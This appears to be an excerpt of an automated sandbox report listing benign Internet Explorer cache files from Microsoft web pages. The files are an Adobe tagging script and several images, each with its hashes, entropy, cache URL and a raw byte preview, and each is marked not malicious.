                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RCfd46e863449c4326b49b6f8f0201afc1-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5834
                                                                                                                                                                                                              Entropy (8bit):5.366624947234412
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:8BBC9azUi4Lr8WB0r0/L9W3NVKFFgE5AzaiN/FgPVKF8gJ2IZt/FssgVKFvsDbIK:8BU9Fi4Lr8e0r0/LY3dRzZN/GwQIZt/s
                                                                                                                                                                                                              MD5:77A118AE67B63A6949677E95BAF34B7A
                                                                                                                                                                                                              SHA1:981E5C1D00763528800A48FC270FA039D115AA26
                                                                                                                                                                                                              SHA-256:F46B3BC34D2AA68634CE16CBDFC45C7BC99A0CBA0F52DE1471CBD7330BC9D832
                                                                                                                                                                                                              SHA-512:66473716E203977E1CCB98CC446831B3EEC39CC6F9089E34DA7A9D864E073123A2FDEC7B042131C94234481C17A0C3D7356F02CD43B571051BC9FCB56869275F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCfd46e863449c4326b49b6f8f0201afc1-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCfd46e863449c4326b49b6f8f0201afc1-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCfd46e863449c4326b49b6f8f0201afc1-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.dcm&&function(e,s,n,g){var t=function(){var e=window.location.pathname,t=window.location.hostname;try{if(n.addToCartSelectors=[\"button[data-bi-bhvr='PARTNERREFERRAL']\",\"a[data-bi-bhvr='PARTNERREFERRAL']\",\"[data-js-href][data-bi-bhvr='PARTNERREFERRAL']:not(.f-precise-click)\",\"a[href*='microsoftstore']:not(#headerArea a)\",\"a[href*='microsoft.com'][href*='/store/']:not(#headerArea a)\",\"a[data-retailer][data-retailer!='']\",\".sku-chooser__panel [data-xbbigid][onclick*='OpenWithExp']\",\".sku-chooser__panel [onclick*='OpenWithExp'].xbstorebuy\",\"a[onclick*=xboxContextualStore]\"],n.addToCartSelectors=n.addToCartSelectors.join(),e.match(/\\/
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE1F5No[1].gif
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1F5No?ver=3a7c
                                                                                                                                                                                                              Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE3NYMe[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):10172
                                                                                                                                                                                                              Entropy (8bit):7.9337347261468345
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:mgxAF2uV21vY9ZTB/SRGhnf2TlbA9kgySZ3hZ7opH:mIAsiZB1hfUbCkgrnZiH
                                                                                                                                                                                                              MD5:B33882EB2679092AF99F02BC687755FD
                                                                                                                                                                                                              SHA1:44D8694FC5C6C00AD20D06848FC634FC1D7176C5
                                                                                                                                                                                                              SHA-256:C8C633E8D99211BA342B64FB183C9C1210E5209C9B97641519BF65ABEE133296
                                                                                                                                                                                                              SHA-512:53046E1271AB1A8A79A3D683A3452627628C8CC9967F0883085BEC0D7EE3528337CA6D3673476E23CC75C747995C63958F8CFE716C0D26F8133B3BCB2EBDA914
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE3NYMe?ver=7b0e&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%......................................................................*................................................................*...........".................................................@.....zw.^cj\"c....T.1....W..#...n...j~..........0b.)HW..w.z.."........P.........b<.+..R.=mR<.7.^.b.=...C...c<.)^T...yJ.rY<.B....>..l...c..)J.T</.....G...'~.........i.3.u..j./.w..... .;..k...G.@..s.)..=-H,.+U.......O;c..G..$.~.AU..fr...n...1X....f.."....9V..s."\..."F.esC..Z=[..mt...;..I...1......L.0|.a.%v~.~_....(..].%.......mEFevJ.q.....&..... U.9..%Di.Y.|..9.7......;.Ro...c....V.\.Z.s2|...%........3..7.....=WQ.C.#F.".2.Ni.|..Zc..!]T..)r.:......S|....i.d...#.>...#v.L.!..........M...{..._.NT.l...%W...ot.1.k|kF..oN^..|..5hwGK.=^1&..SRd..$.\r.....^$.I$.........................................s.0.sHb..`.ja......0@b.tk..l&.`...*G...^....j.V#.....1..m....j.H.G....9..:..........................................&l.)i.. ...r.....w.9....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4FBNw[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 400 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):21525
                                                                                                                                                                                                              Entropy (8bit):7.974478298095287
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:/K2hOmLLgj5sR5nFKTNwpyVQksDyzV0J/Ixv/J3TxnXp+7joabDfZr:/mm850oEyVGOV0J/aFxXpTaPZr
                                                                                                                                                                                                              MD5:EE2D5732A5202FC3E839C41967F3421A
                                                                                                                                                                                                              SHA1:ADB9178749F895E40F5DF2AE97ED17BD135512F6
                                                                                                                                                                                                              SHA-256:D0B198CB78F768B562A51857FFF7AFE25021CB1FAEC4C93C9F8E9FAAC3BD4834
                                                                                                                                                                                                              SHA-512:2D7C6CB826ABF3C515D66FE03D91713943FC47AFB993115FADF523032464ED9CFCF78BFBEA5F974ED64035377931546372B8ED20FD8D10CC530048ABC9EBDA5E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBNw
                                                                                                                                                                                                              Preview: .PNG........IHDR.......x............tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:1DDA7CF0F12A11EAAEEA966F63795798" xmpMM:InstanceID="xmp.iid:1DDA7CEFF12A11EAAEEA966F63795798" xmp:CreatorTool="Adobe Photoshop 2020 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="6028170E2D4BB305E9492692B0A7C2DF" stRef:documentID="6028170E2D4BB305E9492692B0A7C2DF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>;..J..P.IDATx....%.y...z..7..Y03X.P.......7..Y"...iK.d..rE.....%%..J\..Jb.LbI.M..l..a..I.....@`.....f.z.^............b...}o......
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4H9G0[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3817
                                                                                                                                                                                                              Entropy (8bit):7.752034639372318
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:7Z8vKedwAhL1IhYfZAMDaBaneGZquc/oLAdjWs2TQyF:18v/wILehYxAMDaBWFuoEOF
                                                                                                                                                                                                              MD5:848D69D08669A1B3C7452D886F82907F
                                                                                                                                                                                                              SHA1:014E56D3BF2EB8D9691E2C9B6DEEEC0AEECA1EF8
                                                                                                                                                                                                              SHA-256:06C951EDFB3E29BC08DE1D90E276649DDA447E4F01DDC8416C655D5CCABD24D2
                                                                                                                                                                                                              SHA-512:E3CA6B549EB5F9863F3D02234886F5607EA08F7878C2A67754C8835CFEF2E89D2925A6DB60962FDD721197BB4BB98079358D033BF65D5C96B67539365103811D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4H9G0?ver=5bb0&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T...........".....................................................................FX.......I............?j.w...........w.......1... ......g.<.>......:._9[..Y........v...k.8..6R{-.3..P..........r...G...Cb...yZ......F`......N.u......................................................................{@...........D..g....1...".\.u..qKv...................................................je..... .4....@..*..^z.Z.....|...vR$.........@...........................!1..."2@AQ..q.....#4a.6BCVcpDPTu...........?...g-...b.V..`.?..ZO..7..P.....\......."..).."L),.a.....\B..$... .....6d.S..b.!.*.....;!:......1.v.^.i........H.......d.<.u.{.......5......Q......%"9.h....J.......w..s....S.'.A...?.........n..K5a.L'......U(..i....m...B...a..#.....]..._...s....}..6.....Oi..[~.T1.Wf...H..R.....2.....ed.>...........k.r._I94n%i.i%..?.J
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4IeL2[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2687
                                                                                                                                                                                                              Entropy (8bit):7.917109463668172
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nGlFrXlIVIfJferEHhxwkLJ3bB0whFBnoQuhMJuVASZ6vEAq0fK:nGllXlY8JWEhukLJdFBnoQuQuVASZ6MR
                                                                                                                                                                                                              MD5:1171D872A299D3FE978844C3A2829A83
                                                                                                                                                                                                              SHA1:021B8BA03E7A4D92CC9337951E742D203EF1F1EE
                                                                                                                                                                                                              SHA-256:B02FAAB4D61195ECFE8EEB1D270CB9B0FE074191B1A24858421BF462876CB27B
                                                                                                                                                                                                              SHA-512:58C38BCB98DAEE77A4B03A8D1C2B99B28FD6DCC2DAAC12CBD9814A99A10309101208E2897DF3243D1A3A9DEA243A57715DF91BF1D55206BEF591F5148D0DB89F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IeL2?ver=0a9d&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w....9IDATh..]..U...k.3..{.Wo[.........%....$*!...`4..`..'.0..H0.d.W...&.j.D.J4...E ...ZJ...{o....|..33..B?./L3=g.=..{.._..7.w.w..!.8..-@.G........{-.y..3(......?.^j...w..\|/...........z.......O.....4...8..u@...5~W4{.m....v.......O.n$0.~].q0..f..6=".z'6V...:...g.......$P.x......h.0...uU..Vc....^..`........A+..f...h..C..c1.A .#.....$+.....d.%..y..VW\:..t...p.F.m;g..x?...f.....2..>w.qiy-$'....lp..H1\....S.l..%.B1..fr.myd..U....w.....4y...K]W%...S.{.....y..._..$.R...........T.)..Y8.x.Mb.]73.R!Q.[......A..>@.L.Jm...\.a..q.?.>.(.U...Z.kU I...(^.(^V..}.t.&.L.R...z$U5^.d.B.g4...S..k.3..v7..6..`..]Ki.X.6.U..*.6g..B...O4y~.o.W...M..<.Y.h...^..B....>L..)....28.'..A..C....QmU.MS.,;eR...U.qf~....w...{vm.x...z.4sm...<....O.....S%42...".+.HE.j.A.XV.O.........8....=w^5...^b...\...n[.O_9...8.~Jh$.....o.!k!.=b.....).y!...(.%4...I90.:.S....{...X.....Yf..>...v.{.......[.... (CiD#....\...$......O.R.....C../....60.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4IeL3[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2255
                                                                                                                                                                                                              Entropy (8bit):7.863708278448952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nt/BnoPBAtXuOzFKWQLnIydB1AwpJMT1esLxWKc:nt/doZ3AFKFIq1sLS
                                                                                                                                                                                                              MD5:313A323351F1EBB5DA83CD82B6E9070F
                                                                                                                                                                                                              SHA1:3839804F847786482680C214A672B5995273351F
                                                                                                                                                                                                              SHA-256:7EA641DF3A71E963B3954F4B9795AEBA02C3B817BC81EA5271C42FFBB4543295
                                                                                                                                                                                                              SHA-512:A98A0676E4E7E84A2CF989027A789E6CD92D0781E90615B6980D47D2A9A6CA596270374071AFBF7664F53213E3DC5A61B51B7C995C811DD7141AE64BAE945C5D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IeL3?ver=a677&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w.....IDATh..Ym.TW.~.s..|....,..T[.i..X7`.a+X..iPiM.....ME..Q#6...)..P...?.%......)..B..R>Jw.ewvggvf.~...........Vcz...{..9......|.>h..m.v..Y.'..@....m....(.^.n'.6...$..7u..$.@..3y.9.R..k.S][.M.W..[.......l......N .DKw7 $...7.R...).v.Z..w.n..;.+...+..3..i.Q......$B....Bj..:M)....\....b.{..`...F4...>..c.l.x........=....y.0.5..a....M2S.e...[...g....P...F7..%.....3.r...e.}|l|C..{'...l..x.[.0+..........'.'...{.K.).....3.2........_........Y.F.......R..G./mK?.X.:..eo....]J...Ppl".K.....]...u=....`.......9..3W.%3W......c.0cQ,\..Q.D...B....P..W.......).x...g.....1313.J...D "....zM.A...-.......p..(o..h.F....fV....]..|.{....7b`.va....B................*...8P...{......Q.A.1.(XJA..o.M*..X...U...!%"...Y....0.-..w,.....$.m{..:.g...\.x.U....^...[..*!.RN...m..].yf.d.......ra.g.9|...y.....L....z.... ...v....?.B..}....%R.....P..a........|t......q}.s.7...qC.\-..$..]...e...............#......X...].w..J.y[..#b.w<.....p.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4Ihuj[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1797
                                                                                                                                                                                                              Entropy (8bit):7.8374542963654665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nrCDS0RU/rBZoVvdmEaDjdjaa8L5TiDsXf:nX0y/rBZ+m5lja4Dsv
                                                                                                                                                                                                              MD5:A34ED9AB6F9B1EB6C6EB06B47EB93B2C
                                                                                                                                                                                                              SHA1:00C49644908FFCC79CB9880B404B3B82776FBECD
                                                                                                                                                                                                              SHA-256:A4B8A49754D1B6AB03DE9BD1684FA88077964A830CBF39B5EA4BE5F7C632CB03
                                                                                                                                                                                                              SHA-512:80B45398825032E42D966F559E6C0DD49A048C6688079047BDD535757CBD30D0C5C733FA787BC719D517B872B205B145E3F012B45E01977C41101276B6226DCB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Ihuj?ver=35ad&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w.....IDATh..m..W....9g..f{.n7mi....&)....[#.BiRZ.A........(V......M..BD.5.....4..R"I.JR....n.{..;w..;w..V.....=.....9........x.....&....E..Y......6...b...@.r..r.j!...g....w......t..KLh...;q...F.g..B....n.....w ..:.m..#..W...{-...}.....26:7AQ./{S/...k......dQ.V..\9..r...M.Ee0.......~#.*.w.T;. ...X.=U...B?.N..R.87.....{@..J.Y.3^.N.~...A.E...Br%..I.t....0a." .I.NA..O..{T)ek....!Hl.|rU..".+..l.E..lr.#...5UP.......,...]...;..5<.-w='..iJ^~.._j@+BB..A...l...}..)...r..O.m.W...E..+&..............L.+..H.HH.B.PD..e..YM.........L4...O.R..8fie...0.p~.L.f....R....y.B.'..%jG.[6..;wSv%...8w..J.H .=w....n........5..b..T...D......GU....W_`...0...y.f.o. ...t..].ne..M.]....3.z#5>qR.9.".w..9)....sp.c.I.>...Tl...|q..................`.Y..Y...q..?...~...kn.#7....t.k..2.a..?#..h.T..Y.L.o...6..G~..wme..z........|.7<..e..JN......+..^F..X......dc......+.ctd%/.=................$....9...I./.....81.6.:....j...7.....V3.g..1.&".%.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4Ihun[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1984
                                                                                                                                                                                                              Entropy (8bit):7.8793074392890565
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nU0m+QN0fDMbIy+s6sv//zzv7/I3c8V6uBnd2k:npxQNew9+s6qDKBUk
                                                                                                                                                                                                              MD5:2DD2C9E9B26D3DCAD9018D1FE9C6BBE8
                                                                                                                                                                                                              SHA1:C56A4FC5464DCB8EA3DCCBF26C9D8753B6BCAE01
                                                                                                                                                                                                              SHA-256:CA59849D10A13A861EFD426ECD1A247F0D8BB1D1485DABD4F6393E52608EE7DA
                                                                                                                                                                                                              SHA-512:345DD4316CE01E8223A146641BF9BFF59A784165804273EBF8A93776B91B95AA8286CFCCFA7940CA97023502D6784EE5146E6A9ED1A88DC61EF1FAD8B548F7FC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Ihun?ver=36b5&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w....zIDATh..Xm.\W.~.9.s.......&&...l,.E.mJS.FP,. U.....~..-.I...........C..-..iDKL~..J0M..U.q.....w.y_..;s?f...H.0....{........`2&c2&c2&..x.7zA.g.!n.g.Rm...Y.V....,.E..........0.....]0.;.y..U.E.3.!....8.:8.k.O...>...0..+..t..}... ..s.|. .................y.3.....y..ct...x.8E$...C.....|S.._...............+ .+..G...._....X{.L...@G....B.........5!...q.R...K.^c....-...$G...</.4.......q.....~v._....&.|......Y...x.]./XD..@.....{..}..T6.z.;."..Di.....3.8...U~.QH.s..".Z...A..........u>Bd$S.@.=.Z......<.....oS..'....d..`....b>.}.a.6J.i..*..`J.j>.y..y:tX..^s.....Uy3O..*IMf..)yp&.....>z....6..."'...... ....0.sv..j..#/.*..O..w....rI.||..!5X6...]E....8Y,...pl..2.b..P..,.q......0~.<.kiC.....0.....r:^.x.d.7..o.@..J..BJ.."...L..22.Xz."....0x......,"!P....../.d.x......G.t.C@....Z..U)..@96 ..(.:^b......._..O8b..:.i0y..9........`A.<.S.SP...n...#..6...9.........$....Z#}.0..l.C....\"......._W...).u..c.T.......M.L........0.Z;.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4IvMu[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1838
                                                                                                                                                                                                              Entropy (8bit):7.845357023907471
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nIW0gHbv6I9Hi20AG77ewLQfxCOajLxm+uHsvoWyysDU:nIev6qiD7KwLQfxZajLxm+uiwDU
                                                                                                                                                                                                              MD5:FD9D715217931DCF85EE1C9A321C9BE8
                                                                                                                                                                                                              SHA1:CFC26AD6B3AAAE5BE2DD8F125F3E2DDF3E26F514
                                                                                                                                                                                                              SHA-256:772F68D8D14ACF705C012AA11E15B6AD39AE63D46DE6CDBA3C17C06FC2522D66
                                                                                                                                                                                                              SHA-512:59E2E309D605895852B67D46218E178EDA2975E0A3D933AD49C58F44575714CEA0A40E6ECB42DDEEF082D9936F7F5D9F37652CBFFD6DC17003E6BA6C475AA5B2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IvMu?ver=7833&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w.....IDATh..Ol\W....7..'v..Mb'u.N.PJ!.......;..6.X..,Q....B......l...$...Db.B.:..B.8.C..{<3.{..7o.M"......J..}....w.s..>...m...p.mv@.%._..o..7.n|..d...8TE...$...1.3..3.V.LP..!...6.............aS.l..M...].z.%qQ.V....W..'A..#.&........l..'glJ.^..b..D..Tu.Aw.L.~...O..4..\....r..X.A...d.m.AE......}....N...^?.V....:..D.p...(..R...Y....\....R..q..$~..b@..D.....(z.m<.).N..u6....J.z%.......`.....}...'g..1Q=...4gH.....X.z`^5.M:.~g...#.."^_..B.....nP;.k.E.$.*3.:...g.....s8.F O...,b..............06..NY..4.4t...r....spg.El]g.h%.R.h.,wW.T..K....`.....O..:.....;/.s'..K.h.R........N..s.95=D3r.S.S~........W.....e..K.&.eU..,..h.,..p......J.qjz.R..srj.8vX....xq......u..V.;^...86...1.^_.`z.L..q.84Zd|_..6..sC.F..21Rdt0.:..|...<.8......X..|....,3..@.eyq.B10.e..F.r.p..{..-.......-...E...;..+.O`.j......"q.8qd.._.........L..i......t}.....I.;`..7.\.g...u.......P............u.>..^<.ON.s3W.4[..~.J:".. i...:..B.q...W.x._...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4IvMv[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1735
                                                                                                                                                                                                              Entropy (8bit):7.8579831023968865
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:nFDJus9y3QawIoT0REtZAPwIt21TQGdc0LN:nFDJEbREXAP1tyDLN
                                                                                                                                                                                                              MD5:0296D2C874DCD2BBF478F6100B46135B
                                                                                                                                                                                                              SHA1:0A3B9E069D86F5A07ADD5A6712FC0D712B5DF128
                                                                                                                                                                                                              SHA-256:B9879F8A4A671A8F7ADAC72D6DEBB47497CC415F3731B4EB42519889A309B249
                                                                                                                                                                                                              SHA-512:F6A64161DE77CA88348756A50CAB20AA2F1C1024F775079E8054B22EC10D65BA07527340560638D3CB56DDAF70BAB0782DB965D7E83BFF9B3D1CD8F2BA5FA1B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IvMv?ver=e251&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...0.....W.......orNT..w.....IDATh..].\g..........l.MR........WMAKE........x...E./DT......JA..D.,.,. ^$D.......&Mw7...dg...x1g.93.5...V.wg.s.;.........q.8..m...dw{......o}GIv....u..O..?../>.......~d"..1k..B.+.WU.q.8X..........lR0(~w.....Z..`..9...6(^.........}.U......b@...UEu..<z.....Q.v.]+D...^._.....t.G.*.0.g.(..e...../Q".X..+A.Y.~.=...j....4.....{e..=...;.Ec.!.UD6.+R..n..w.W.)..5.P.x<......e4r@.......//.... 8D....hru..1....,....T.....=9.....`5n...1.;...q.l...$...h...`.y|.@.t:'.zZ..\P...RM.8k.d..D v..A....I..+..A...d....../......U%.Y..Gd..q...j.:...i6Z....*.%..#..p..'8......;h7..l..=:....I...NX|..G..4....q-..R..^..%.;....w...O...(.U1.!.w...{.....@F..]oi.;Z....,....L`.Y^......k..LMC.P..2"....-Z....;.=....V\.-4O.U_:...:.(.T{....?.9....<....{.8i....:.}..F5..j.RF..N......s.L.....&K}.m....x..I..J......h...[E.[a....G..?|.......D...W.n...0h..x....KXk6...L.Rs./...,.c..xP.<...9....x.{.#..M}%..}..;.H.v..n..5+....I.....o.*
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RE4hgqN[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 359x234, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3464
                                                                                                                                                                                                              Entropy (8bit):6.8572628048727395
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:BGKuERABs+dddddddddddddddddTFTvAzfJW0MdHW8Gu4Fjdddddddddddddd53m:BGdEVwFTvIR9sMsuBrLqJ9Y6r
                                                                                                                                                                                                              MD5:A33C257477A176B69241EC416CA74160
                                                                                                                                                                                                              SHA1:3DB79476AF74637111206FB26A77F3A1221D4E9D
                                                                                                                                                                                                              SHA-256:A3A8A262F6A5A57F517E7E362A45C727F61EFC6FC6B98DE3BA3BD29DBEBE65BD
                                                                                                                                                                                                              SHA-512:6918D084CED2141A4AABC52D4A1409F7AD563A8D98976E6E477706F2965D38BDD3EB0F48153BB3C7CB0EC5364B78FF40870FFCFC7561915182CDD5C00F2A4A70
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4hgqN?ver=26d3.gif&q=60&m=6&h=235&w=375&b=%23FFFFFFFF&l=f&n=f&f=jpg&o=t&aim=true
